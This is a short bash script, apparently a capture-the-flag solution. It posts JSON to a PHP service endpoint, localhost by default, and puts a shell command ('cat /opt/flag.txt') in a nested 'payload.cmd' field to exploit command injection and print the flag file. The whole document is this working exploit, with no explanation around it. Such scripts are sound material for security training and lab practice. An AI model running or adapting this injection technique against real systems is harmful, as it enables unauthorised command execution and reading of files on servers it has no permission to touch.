#!/usr/bin/env bash
set -euo pipefail
URL="${1:-http://localhost:8080/public/api/service.php}"

echo "[*] Exploiting nested JSON -> payload.cmd to read /opt/flag.txt ..."
curl -s -X POST "$URL" \
  -H "Content-Type: application/json" \
  --data '{"session":{"user":"guest"},"payload":{"cmd":"cat /opt/flag.txt"}}' \
  | sed -e 's/^/[FLAG] /'